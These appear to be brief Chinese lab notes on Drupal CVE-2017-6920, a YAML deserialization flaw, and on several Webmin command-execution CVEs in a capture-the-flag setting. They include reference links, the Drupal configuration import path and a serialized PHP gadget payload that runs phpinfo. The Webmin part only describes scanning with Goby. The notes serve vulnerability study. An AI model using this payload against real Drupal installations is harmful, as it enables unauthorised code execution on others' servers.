Drupal远程代码执行CVE-2017-6920

参考:

PHP反序列化漏洞的原理及复现 - FreeBuf网络安全行业门户

CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造 (seebug.org)

代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习 - tr1ple - 博客园 (cnblogs.com)

Drupal YAML 反序列化代码执行漏洞(CVE-2017-6920)复现及分析 - FreeBuf网络安全行业门户

(CVE 2017 6920)Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 - VulDoc

POC

/admin/config/development/configuration/single/import

!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:7:\"methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

Webmin 命令执行漏洞 (CVE-2020-35606,CVE-2019-15107,CVE-2021-31760,CVE-2019-15642)

webmin 远程代码执行 (CVE-2019-15642)
webmin 远程命令执行 (CVE-2019-15107)
Webmin 命令执行漏洞 (CVE-2020-35606)
webmin 代码执行          (CVE-2021-31760)
因为goby有这个漏洞得验证,直接使用goby进行扫描和验证,
启动靶机会提示类似得界面,flag一般在/tmp目录,
使用goby扫描
扫描出漏洞
对漏洞进行验证
其他几个类似靶机使用同样方法,只需要修改hostinfo地址即可,不用重新扫描